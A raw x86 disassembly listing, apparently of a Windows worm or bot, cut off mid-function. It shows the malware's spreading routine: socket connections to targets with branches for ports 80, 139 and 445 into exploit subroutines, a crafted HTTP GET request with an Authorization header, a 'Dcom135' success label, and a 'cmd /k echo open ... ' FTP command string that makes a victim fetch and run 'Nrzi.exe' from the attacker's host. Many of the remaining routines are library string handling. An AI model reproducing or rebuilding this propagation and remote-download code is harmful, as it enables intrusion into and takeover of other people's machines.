lea ecx, [ebp+var_24]
call sub_402D03
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_C]
call sub_402D03
mov al, [ebp+var_28]
jmp loc_402998
; ---------------------------------------------------------------------------
loc_40290B: ; CODE XREF: sub_40288F+56�j
lea ecx, [ebp+var_24]
call sub_402DD0
push eax
lea ecx, [ebp+arg_C]
call sub_402DD0
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push [ebp+Count] ; Count
push [ebp+Memory] ; Dest
call __snprintf
add esp, 14h
push 0
push [ebp+Count]
push [ebp+Memory]
push [ebp+arg_0]
call dword_426470 ; send
cmp eax, [ebp+Count]
jz short loc_402970
push [ebp+Memory] ; Memory
call _free
pop ecx
and [ebp+var_2C], 0
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_24]
call sub_402D03
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_C]
call sub_402D03
mov al, [ebp+var_2C]
jmp short loc_402998
; ---------------------------------------------------------------------------
loc_402970: ; CODE XREF: sub_40288F+B5�j
push [ebp+Memory] ; Memory
call _free
pop ecx
mov [ebp+var_30], 1
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_24]
call sub_402D03
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_C]
call sub_402D03
mov al, [ebp+var_30]
loc_402998: ; CODE XREF: sub_40288F+77�j
; sub_40288F+DF�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop esi
leave
retn
sub_40288F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 640h
push edi
and byte ptr [ebp-408h], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-407h]
rep stosd
stosw
stosb
push 8Fh
push offset dword_41E874
lea eax, [ebp-408h]
push eax
call _memcpy
add esp, 0Ch
push offset String2 ; "Nrzi.exe"
push offset String2 ; "Nrzi.exe"
push hostshort
push dword ptr [ebp+8]
call sub_40892F
pop ecx
push eax
push offset aCmdKEchoOpenSD ; "cmd /k echo open %s %d > o&echo user 1 "...
push 400h
lea eax, [ebp-379h]
push eax
call __snprintf
add esp, 1Ch
mov [ebp-4], eax
mov eax, [ebp-4]
add eax, 90h
mov [ebp-418h], eax
push dword ptr [ebp-418h]
lea eax, [ebp-408h]
push eax
push 164h
push offset aSvwfbA ; "SVWf"
lea eax, [ebp-634h]
push eax
call sub_401EC3
add esp, 14h
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp-414h], ecx
mov [ebp-410h], eax
cmp dword ptr [ebp-410h], 0
jnz short loc_402A6C
xor eax, eax
jmp loc_402C5D
; ---------------------------------------------------------------------------
loc_402A6C: ; CODE XREF: .text:00402A63�j
and dword ptr [ebp-8], 0
and dword ptr [ebp-40Ch], 0
loc_402A77: ; CODE XREF: .text:00402BE6�j
cmp dword ptr [ebp-8], 2
jge loc_402BEB
cmp dword ptr [ebp-40Ch], 0
jnz loc_402BEB
push 6
push 1
push 2
call ds:socket ; socket
mov [ebp-41Ch], eax
cmp dword ptr [ebp-41Ch], 0FFFFFFFFh
jz loc_402BCB
and word ptr [ebp-42Ch], 0
xor eax, eax
lea edi, [ebp-42Ah]
stosd
stosd
stosd
stosw
mov word ptr [ebp-42Ch], 2
push dword ptr [ebp+0A8h]
call dword_426424 ; ntohs
mov [ebp-42Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_426460 ; inet_addr
mov [ebp-428h], eax
push 10h
lea eax, [ebp-42Ch]
push eax
push dword ptr [ebp-41Ch]
call dword_4263D8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402BBF
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_402B5F
sub esp, 10h
mov ecx, esp
mov [ebp-638h], esp
lea eax, [ebp-63Ch]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_402CD6
push dword ptr [ebp-410h]
push dword ptr [ebp-414h]
push dword ptr [ebp-41Ch]
call sub_40288F
add esp, 1Ch
mov [ebp-63Dh], al
movzx eax, byte ptr [ebp-63Dh]
mov [ebp-40Ch], eax
jmp short loc_402BBF
; ---------------------------------------------------------------------------
loc_402B5F: ; CODE XREF: .text:00402B13�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_402B90
push dword ptr [ebp-410h]
push dword ptr [ebp-414h]
push dword ptr [ebp-41Ch]
call sub_4025FE
add esp, 0Ch
movzx eax, al
mov [ebp-40Ch], eax
jmp short loc_402BBF
; ---------------------------------------------------------------------------
loc_402B90: ; CODE XREF: .text:00402B69�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_402BBF
push dword ptr [ebp-410h]
push dword ptr [ebp-414h]
push dword ptr [ebp-41Ch]
call sub_402428
add esp, 0Ch
movzx eax, al
mov [ebp-40Ch], eax
loc_402BBF: ; CODE XREF: .text:00402B06�j
; .text:00402B5D�j ...
push dword ptr [ebp-41Ch]
call dword_4264B8 ; closesocket
loc_402BCB: ; CODE XREF: .text:00402AA7�j
cmp dword ptr [ebp-40Ch], 0
jnz short loc_402BDF
push 3E8h
call ds:Sleep ; Sleep
loc_402BDF: ; CODE XREF: .text:00402BD2�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
jmp loc_402A77
; ---------------------------------------------------------------------------
loc_402BEB: ; CODE XREF: .text:00402A7B�j
; .text:00402A88�j
lea ecx, [ebp-414h]
call sub_401C16
cmp dword ptr [ebp-40Ch], 0
jz short loc_402C57
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSS_ ; "%s// %s."
push 200h
lea eax, [ebp-62Ch]
push eax
call __snprintf
add esp, 14h
lea eax, [ebp-62Ch]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+0B0h]
imul eax, 3Ch
mov eax, dword_41EDA0[eax]
inc eax
mov ecx, [ebp+0B0h]
imul ecx, 3Ch
mov dword_41EDA0[ecx], eax
loc_402C57: ; CODE XREF: .text:00402BFD�j
mov eax, [ebp-40Ch]
loc_402C5D: ; CODE XREF: .text:00402A67�j
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C60 proc near ; DATA XREF: .data:0041E004�o
push ebp
mov ebp, esp
call sub_403540
call sub_402C6F
pop ebp
retn
sub_402C60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C6F proc near ; CODE XREF: sub_402C60+8�p
push ebp
mov ebp, esp
push offset __initp_misc_winxfltr ; void (__cdecl *)()
call _atexit
pop ecx
pop ebp
retn
sub_402C6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C7F proc near ; CODE XREF: sub_4026C9+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
mov al, [eax]
mov ecx, [ebp+var_4]
mov [ecx], al
push 0
mov ecx, [ebp+var_4]
call sub_40317D
mov eax, [ebp+var_4]
leave
retn 4
sub_402C7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CA1 proc near ; CODE XREF: sub_4026C9+19E�p
; sub_41AF94+32�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
mov al, [eax]
mov ecx, [ebp+var_4]
mov [ecx], al
push 0
mov ecx, [ebp+var_4]
call sub_40317D
push ds:dword_41C230
push 0
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_402EB2
mov eax, [ebp+var_4]
leave
retn 4
sub_402CA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CD6 proc near ; CODE XREF: .text:00402B2B�p
; sub_41B009+19�p ...
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov al, [eax]
mov ecx, [ebp+var_4]
mov [ecx], al
push 0
mov ecx, [ebp+var_4]
call sub_40317D
push [ebp+Str] ; Str
mov ecx, [ebp+var_4]
call sub_402FF8
mov eax, [ebp+var_4]
leave
retn 8
sub_402CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D03 proc near ; CODE XREF: sub_4026C9+1B2�p
; sub_40288F+63�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 1
mov ecx, [ebp+var_4]
call sub_40317D
leave
retn
sub_402D03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402D16(char *Str)
sub_402D16 proc near ; CODE XREF: sub_4026C9+166�p
var_4 = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+Src] ; Str
call sub_402D36
pop ecx
push eax ; Size
push [ebp+Src] ; Src
mov ecx, [ebp+var_4]
call sub_402E2B
leave
retn 4
sub_402D16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402D36(char *Str)
sub_402D36 proc near ; CODE XREF: sub_402D16+A�p
; sub_402FF8+A�p
Str = dword ptr 8
push ebp
mov ebp, esp
push [ebp+Str] ; Str
call _strlen
pop ecx
pop ebp
retn
sub_402D36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402D44(size_t Size, int)
sub_402D44 proc near ; CODE XREF: sub_4026C9+14C�p
; sub_4026C9+18B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Size = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, ds:dword_41C230
sub ecx, [eax+8]
cmp ecx, [ebp+Size]
ja short loc_402D62
call sub_41B110
loc_402D62: ; CODE XREF: sub_402D44+17�j
cmp [ebp+Size], 0
jbe short loc_402DAF
push 0
mov eax, [ebp+var_8]
mov eax, [eax+8]
add eax, [ebp+Size]
mov [ebp+var_4], eax
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403055
movzx eax, al
test eax, eax
jz short loc_402DAF
lea eax, [ebp+arg_4]
push eax ; int
push [ebp+Size] ; Size
mov eax, [ebp+var_8]
mov eax, [eax+4]
mov ecx, [ebp+var_8]
add eax, [ecx+8]
push eax ; Dst
call sub_402DB6
add esp, 0Ch
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403018
loc_402DAF: ; CODE XREF: sub_402D44+22�j
; sub_402D44+42�j
mov eax, [ebp+var_8]
leave
retn 8
sub_402D44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402DB6(void *Dst, size_t Size, int)
sub_402DB6 proc near ; CODE XREF: sub_402D44+58�p
Dst = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+Size] ; Size
mov eax, [ebp+arg_8]
movsx eax, byte ptr [eax]
push eax ; Val
push [ebp+Dst] ; Dst
call _memset
add esp, 0Ch
pop ebp
retn
sub_402DB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DD0 proc near ; CODE XREF: sub_40288F+7F�p
; sub_40288F+88�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jnz short loc_402DEB
call sub_403173
mov [ebp+var_8], eax
jmp short loc_402DF4
; ---------------------------------------------------------------------------
loc_402DEB: ; CODE XREF: sub_402DD0+F�j
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov [ebp+var_8], eax
loc_402DF4: ; CODE XREF: sub_402DD0+19�j
mov eax, [ebp+var_8]
leave
retn
sub_402DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DF9 proc near ; CODE XREF: sub_40288F+30�p
; sub_40288F+3A�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax+8]
leave
retn
sub_402DF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E08 proc near ; CODE XREF: sub_4026C9+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
cmp eax, [ebp+arg_0]
jnb short locret_402E27
push 0
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_403055
locret_402E27: ; CODE XREF: sub_402E08+10�j
leave
retn 4
sub_402E08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402E2B(void *Src, size_t Size)
sub_402E2B proc near ; CODE XREF: sub_402D16+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, ds:dword_41C230
sub ecx, [eax+8]
cmp ecx, [ebp+Size]
ja short loc_402E49
call sub_41B110
loc_402E49: ; CODE XREF: sub_402E2B+17�j
cmp [ebp+Size], 0
jbe short loc_402E95
push 0
mov eax, [ebp+var_8]
mov eax, [eax+8]
add eax, [ebp+Size]
mov [ebp+var_4], eax
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403055
movzx eax, al
test eax, eax
jz short loc_402E95
push [ebp+Size] ; Size
push [ebp+Src] ; Src
mov eax, [ebp+var_8]
mov eax, [eax+4]
mov ecx, [ebp+var_8]
add eax, [ecx+8]
push eax ; Dst
call sub_402E9C
add esp, 0Ch
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403018
loc_402E95: ; CODE XREF: sub_402E2B+22�j
; sub_402E2B+42�j
mov eax, [ebp+var_8]
leave
retn 8
sub_402E2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402E9C(void *Dst, void *Src, size_t Size)
sub_402E9C proc near ; CODE XREF: sub_402E2B+57�p
; sub_402EB2+12C�p ...
Dst = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
pop ebp
retn
sub_402E9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EB2 proc near ; CODE XREF: sub_402CA1+29�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Size = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_0]
call sub_402DF9
cmp eax, [ebp+arg_4]
jnb short loc_402ECD
call sub_41B009
loc_402ECD: ; CODE XREF: sub_402EB2+14�j
mov ecx, [ebp+arg_0]
call sub_402DF9
sub eax, [ebp+arg_4]
mov [ebp+Size], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+Size]
jnb short loc_402EE9
mov eax, [ebp+arg_8]
mov [ebp+Size], eax
loc_402EE9: ; CODE XREF: sub_402EB2+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_0]
jnz short loc_402F18
push ds:dword_41C230
mov eax, [ebp+arg_4]
add eax, [ebp+Size]
push eax
mov ecx, [ebp+var_8]
call sub_403257
push [ebp+arg_4]
push 0
mov ecx, [ebp+var_8]
call sub_403257
jmp loc_402FF1
; ---------------------------------------------------------------------------
loc_402F18: ; CODE XREF: sub_402EB2+3D�j
cmp [ebp+Size], 0
jbe loc_402FB5
mov ecx, [ebp+arg_0]
call sub_402DF9
cmp [ebp+Size], eax
jnz loc_402FB5
mov ecx, [ebp+arg_0]
call sub_402DD0
push eax
mov ecx, [ebp+var_8]
call sub_403462
movzx eax, byte ptr [eax]
cmp eax, 0FEh
jge short loc_402FB5
push [ebp+arg_0]
push [ebp+var_8]
call sub_403521
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_402FB5
push 1
mov ecx, [ebp+var_8]
call sub_40317D
mov ecx, [ebp+arg_0]
call sub_402DD0
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
call sub_402DF9
mov ecx, [ebp+var_8]
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
call sub_40333B
mov ecx, [ebp+var_8]
mov [ecx+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov ecx, [ebp+var_8]
call sub_403462
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov al, [eax]
add al, 1
mov ecx, [ebp+var_C]
mov [ecx], al
jmp short loc_402FF1
; ---------------------------------------------------------------------------
loc_402FB5: ; CODE XREF: sub_402EB2+6A�j
; sub_402EB2+7B�j ...
push 1
push [ebp+Size]
mov ecx, [ebp+var_8]
call sub_403055
movzx eax, al
test eax, eax
jz short loc_402FF1
push [ebp+Size] ; Size
mov ecx, [ebp+arg_0]
call sub_402DD0
add eax, [ebp+arg_4]
push eax ; Src
mov eax, [ebp+var_8]
push dword ptr [eax+4] ; Dst
call sub_402E9C
add esp, 0Ch
push [ebp+Size]
mov ecx, [ebp+var_8]
call sub_403018
loc_402FF1: ; CODE XREF: sub_402EB2+61�j
; sub_402EB2+101�j ...
mov eax, [ebp+var_8]
leave
retn 0Ch
sub_402EB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402FF8(char *Str)
sub_402FF8 proc near ; CODE XREF: sub_402CD6+21�p
; sub_403485+57�p
var_4 = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push [ebp+Src] ; Str
call sub_402D36
pop ecx
push eax ; Size
push [ebp+Src] ; Src
mov ecx, [ebp+var_4]
call sub_403216
leave
retn 4
sub_402FF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403018 proc near ; CODE XREF: sub_402D44+66�p
; sub_402E2B+65�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [eax+8], ecx
mov eax, [ebp+var_8]
mov eax, [eax+4]
add eax, [ebp+arg_0]
push eax
call sub_403046
pop ecx
pop ecx
leave
retn 4
sub_403018 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403046 proc near ; CODE XREF: sub_403018+23�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov cl, [ecx]
mov [eax], cl
pop ebp
retn
sub_403046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403055 proc near ; CODE XREF: sub_402D44+38�p
; sub_402E08+1A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_40330B
cmp eax, [ebp+arg_0]
jnb short loc_40306F
call sub_41B110
loc_40306F: ; CODE XREF: sub_403055+13�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jz short loc_4030EB
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_4030EB
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
movzx eax, byte ptr [eax]
cmp eax, 0FFh
jz short loc_4030EB
cmp [ebp+arg_0], 0
jnz short loc_4030D9
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov al, [eax]
sub al, 1
mov ecx, [ebp+var_8]
mov [ecx], al
push 0
mov ecx, [ebp+var_4]
call sub_40317D
xor al, al
jmp locret_40316F
; ---------------------------------------------------------------------------
loc_4030D9: ; CODE XREF: sub_403055+54�j
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_40334A
mov al, 1
jmp locret_40316F
; ---------------------------------------------------------------------------
loc_4030EB: ; CODE XREF: sub_403055+21�j
; sub_403055+36�j ...
cmp [ebp+arg_0], 0
jnz short loc_40311C
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_403105
push 1
mov ecx, [ebp+var_4]
call sub_40317D
jmp short loc_403118
; ---------------------------------------------------------------------------
loc_403105: ; CODE XREF: sub_403055+A2�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jz short loc_403118
push 0
mov ecx, [ebp+var_4]
call sub_403018
loc_403118: ; CODE XREF: sub_403055+AE�j
; sub_403055+B7�j
xor al, al
jmp short locret_40316F
; ---------------------------------------------------------------------------
loc_40311C: ; CODE XREF: sub_403055+9A�j
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_40314F
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 1Fh
ja short loc_403138
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
cmp eax, [ebp+arg_0]
jnb short loc_40314F
loc_403138: ; CODE XREF: sub_403055+D6�j
push 1
mov ecx, [ebp+var_4]
call sub_40317D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_40334A
jmp short loc_40316D
; ---------------------------------------------------------------------------
loc_40314F: ; CODE XREF: sub_403055+CD�j
; sub_403055+E1�j
movzx eax, [ebp+arg_4]
test eax, eax
jnz short loc_40316D
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
cmp eax, [ebp+arg_0]
jnb short loc_40316D
push [ebp+arg_0]
mov ecx, [ebp+var_4]
call sub_40334A
loc_40316D: ; CODE XREF: sub_403055+F8�j
; sub_403055+100�j ...
mov al, 1
locret_40316F: ; CODE XREF: sub_403055+7F�j
; sub_403055+91�j ...
leave
retn 8
sub_403055 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403173 proc near ; CODE XREF: sub_402DD0+11�p
push ebp
mov ebp, esp
mov eax, offset dword_41C234
pop ebp
retn
sub_403173 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40317D proc near ; CODE XREF: sub_402C7F+16�p
; sub_402CA1+16�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], ecx
movzx eax, [ebp+arg_0]
test eax, eax
jz short loc_403196
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jnz short loc_403198
loc_403196: ; CODE XREF: sub_40317D+E�j
jmp short loc_4031FD
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_40317D+17�j
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_4031C5
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
movzx eax, byte ptr [eax]
cmp eax, 0FFh
jnz short loc_4031E0
loc_4031C5: ; CODE XREF: sub_40317D+2E�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
inc eax
inc eax
push eax ; int
mov eax, [ebp+var_4]
mov eax, [eax+4]
dec eax
push eax ; Memory
mov ecx, [ebp+var_4]
call sub_403471
jmp short loc_4031FD
; ---------------------------------------------------------------------------
loc_4031E0: ; CODE XREF: sub_40317D+46�j
mov eax, [ebp+var_4]
push dword ptr [eax+4]
mov ecx, [ebp+var_4]
call sub_403462
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov al, [eax]
sub al, 1
mov ecx, [ebp+var_8]
mov [ecx], al
loc_4031FD: ; CODE XREF: sub_40317D:loc_403196�j
; sub_40317D+61�j
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
mov eax, [ebp+var_4]
and dword ptr [eax+0Ch], 0
leave
retn 4
sub_40317D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_403216(void *Src, size_t Size)
sub_403216 proc near ; CODE XREF: sub_402FF8+17�p
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 1
push [ebp+Size]
mov ecx, [ebp+var_4]
call sub_403055
movzx eax, al
test eax, eax
jz short loc_403250
push [ebp+Size] ; Size
push [ebp+Src] ; Src
mov eax, [ebp+var_4]
push dword ptr [eax+4] ; Dst
call sub_402E9C
add esp, 0Ch
push [ebp+Size]
mov ecx, [ebp+var_4]
call sub_403018
loc_403250: ; CODE XREF: sub_403216+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_403216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403257 proc near ; CODE XREF: sub_402EB2+4F�p
; sub_402EB2+5C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov eax, [eax+8]
cmp eax, [ebp+arg_0]
jnb short loc_40326F
call sub_41B009
loc_40326F: ; CODE XREF: sub_403257+11�j
mov ecx, [ebp+var_8]
call sub_403485
mov eax, [ebp+var_8]
mov eax, [eax+8]
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_403291
mov eax, [ebp+var_8]
mov eax, [eax+8]
sub eax, [ebp+arg_0]
mov [ebp+arg_4], eax
loc_403291: ; CODE XREF: sub_403257+2C�j
cmp [ebp+arg_4], 0
jbe short loc_4032EE
mov eax, [ebp+var_8]
mov eax, [eax+8]
sub eax, [ebp+arg_0]
sub eax, [ebp+arg_4]
push eax ; Size
mov eax, [ebp+var_8]
mov eax, [eax+4]
add eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax ; Src
mov eax, [ebp+var_8]
mov eax, [eax+4]
add eax, [ebp+arg_0]
push eax ; Dst
call sub_4032F5
add esp, 0Ch
mov eax, [ebp+var_8]
mov eax, [eax+8]
sub eax, [ebp+arg_4]
mov [ebp+var_4], eax
push 0
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403055
movzx eax, al
test eax, eax
jz short loc_4032EE
push [ebp+var_4]
mov ecx, [ebp+var_8]
call sub_403018
loc_4032EE: ; CODE XREF: sub_403257+3E�j
; sub_403257+8A�j
mov eax, [ebp+var_8]
leave
retn 8
sub_403257 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4032F5(void *Dst, void *Src, size_t Size)
sub_4032F5 proc near ; CODE XREF: sub_403257+64�p
Dst = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+Dst] ; Dst
call _memcpy_0
add esp, 0Ch
pop ebp
retn
sub_4032F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40330B proc near ; CODE XREF: sub_403055+B�p
; sub_40334A+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], ecx
mov ecx, [ebp+var_8]
call sub_4034FA
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
ja short loc_40332E
mov [ebp+var_C], 1
jmp short loc_403336
; ---------------------------------------------------------------------------
loc_40332E: ; CODE XREF: sub_40330B+18�j
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_C], eax
loc_403336: ; CODE XREF: sub_40330B+21�j
mov eax, [ebp+var_C]
leave
retn
sub_40330B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40333B proc near ; CODE XREF: sub_402EB2+D9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
leave
retn
sub_40333B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40334A proc near ; CODE XREF: sub_403055+8A�p
; sub_403055+F3�p ...
var_2C = dword ptr -2Ch
Size = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset sub_41B34C
call __EH_prolog
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_20], ecx
mov eax, [ebp+arg_0]
or al, 1Fh
mov [ebp+var_1C], eax
mov ecx, [ebp+var_20]
call sub_40330B
cmp eax, [ebp+var_1C]
jnb short loc_40337C
mov eax, [ebp+arg_0]
mov [ebp+var_1C], eax
loc_40337C: ; CODE XREF: sub_40334A+2A�j
and [ebp+var_4], 0
push 0
mov eax, [ebp+var_1C]
inc eax
inc eax
push eax
mov ecx, [ebp+var_20]
call sub_4034E3
